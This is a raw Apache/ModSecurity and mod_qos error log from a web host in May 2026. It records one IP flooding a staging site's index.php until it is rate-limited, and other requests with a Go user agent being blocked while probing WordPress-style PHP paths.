[Tue May 26 19:59:57.346991 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U_QAAAN0"]
[Tue May 26 19:59:57.347761 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VIwAAALc"]
[Tue May 26 19:59:57.350691 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U6gAAALI"]
[Tue May 26 19:59:57.354267 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3rwAAACc"]
[Tue May 26 19:59:57.358325 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VIgAAAM8"]
[Tue May 26 19:59:57.360216 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VKAAAAPM"]
[Tue May 26 19:59:57.364058 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY4ZZc2DoU1lPnP1U-gAAALY"]
[Tue May 26 19:59:57.366804 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz33gAAADI"]
[Tue May 26 19:59:57.375634 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VJQAAANg"]
[Tue May 26 19:59:57.378031 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VJAAAAMM"]
[Tue May 26 19:59:57.384861 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuY2DRMqfxdEDkosz3rAAAABA"]
[Tue May 26 19:59:57.388070 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VJwAAALs"]
[Tue May 26 19:59:57.398085 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VKQAAAPQ"]
[Tue May 26 19:59:57.400959 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VKgAAAKY"]
[Tue May 26 19:59:57.413963 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4IAAAACU"]
[Tue May 26 19:59:57.417174 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VOAAAAN4"]
[Tue May 26 19:59:57.428367 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4DwAAACk"]
[Tue May 26 19:59:57.434281 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4HgAAAHE"]
[Tue May 26 19:59:57.437873 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VNgAAAP8"]
[Tue May 26 19:59:57.443400 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VNQAAAJE"]
[Tue May 26 19:59:57.767320 2026] [security2:error] [pid 106517:tid 106765] [client 103.163.220.21:31617] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/404.php"] [unique_id "ahWuZYZZc2DoU1lPnP1VfAAAAPc"]
[Tue May 26 19:59:58.077925 2026] [qos:error] [pid 106517:tid 106653] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZoZZc2DoU1lPnP1VmwAAAIg
[Tue May 26 19:59:58.265786 2026] [security2:error] [pid 106517:tid 106705] [client 103.163.220.12:57591] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/news-portal/sitebar.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VoAAAALs"]
[Tue May 26 19:59:58.276195 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4JAAAAC0"]
[Tue May 26 19:59:58.280807 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4IgAAAHc"]
[Tue May 26 19:59:58.288754 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VQAAAAKg"]
[Tue May 26 19:59:58.300566 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VSQAAALg"]
[Tue May 26 19:59:58.307378 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VRwAAALU"]
[Tue May 26 19:59:58.308444 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4LAAAAFs"]
[Tue May 26 19:59:58.312365 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4GQAAAFE"]
[Tue May 26 19:59:58.316330 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VNwAAANI"]
[Tue May 26 19:59:58.319162 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VTAAAAMc"]
[Tue May 26 19:59:58.320406 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VQQAAAMk"]
[Tue May 26 19:59:58.320604 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VQgAAALw"]
[Tue May 26 19:59:58.326225 2026] [security2:error] [pid 106517:tid 106749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VTwAAAOc"]
[Tue May 26 19:59:58.328889 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4MgAAAEA"]
[Tue May 26 19:59:58.334282 2026] [security2:error] [pid 106517:tid 106772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VUAAAAP4"]
[Tue May 26 19:59:58.336806 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VRQAAANU"]
[Tue May 26 19:59:58.342901 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4OQAAAEY"]
[Tue May 26 19:59:58.344258 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4fAAAAH0"]
[Tue May 26 19:59:58.366868 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4gQAAABU"]
[Tue May 26 19:59:58.367423 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZGDRMqfxdEDkosz4DgAAAHk"]
[Tue May 26 19:59:58.371097 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VMgAAAJk"]
[Tue May 26 19:59:58.378871 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZIZZc2DoU1lPnP1VPgAAAJU"]
[Tue May 26 19:59:58.383307 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4fQAAAFA"]
[Tue May 26 19:59:58.390817 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4ggAAAFM"]
[Tue May 26 19:59:58.394339 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4gAAAAAU"]
[Tue May 26 19:59:58.394679 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4egAAAAs"]
[Tue May 26 19:59:58.397020 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4hQAAABA"]
[Tue May 26 19:59:58.399562 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4dgAAAA0"]
[Tue May 26 19:59:58.400077 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4gwAAADk"]
[Tue May 26 19:59:58.408838 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4iAAAAH8"]
[Tue May 26 19:59:58.422431 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4lQAAAE8"]
[Tue May 26 19:59:58.429130 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4kgAAACI"]
[Tue May 26 19:59:58.430012 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4qQAAABs"]
[Tue May 26 19:59:58.431685 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4iQAAAEI"]
[Tue May 26 19:59:58.441518 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4kwAAAHY"]
[Tue May 26 19:59:58.445030 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4lgAAAF4"]
[Tue May 26 19:59:58.574575 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZmDRMqfxdEDkosz49wAAACo
[Tue May 26 19:59:58.574612 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz4-QAAAEI
[Tue May 26 19:59:58.574977 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZmDRMqfxdEDkosz4-AAAADY
[Tue May 26 19:59:58.577522 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz4_QAAAAY
[Tue May 26 19:59:58.578685 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZmDRMqfxdEDkosz4_gAAAHY
[Tue May 26 19:59:58.580769 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5AAAAAF4
[Tue May 26 19:59:58.583172 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5AgAAAEs
[Tue May 26 19:59:58.590108 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5BAAAAAA
[Tue May 26 19:59:58.590758 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5BQAAADo
[Tue May 26 19:59:58.598544 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5BwAAAHc
[Tue May 26 19:59:58.767023 2026] [security2:error] [pid 106517:tid 106721] [client 103.163.220.17:35517] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/updates.php"] [unique_id "ahWuZoZZc2DoU1lPnP1V3QAAAMs"]
[Tue May 26 19:59:58.831715 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5DAAAAE4
[Tue May 26 19:59:58.832425 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5DgAAADY
[Tue May 26 19:59:58.832430 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5DQAAACc
[Tue May 26 19:59:58.833224 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZoZZc2DoU1lPnP1V4gAAANU
[Tue May 26 19:59:58.833380 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5DwAAADY
[Tue May 26 19:59:58.834294 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5EAAAAHg
[Tue May 26 19:59:58.835121 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5EQAAADc
[Tue May 26 19:59:58.840364 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5EgAAAAY
[Tue May 26 19:59:58.841979 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5EwAAAHY
[Tue May 26 19:59:58.843808 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:58014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5FAAAAFg
[Tue May 26 19:59:58.980051 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5FwAAAEs
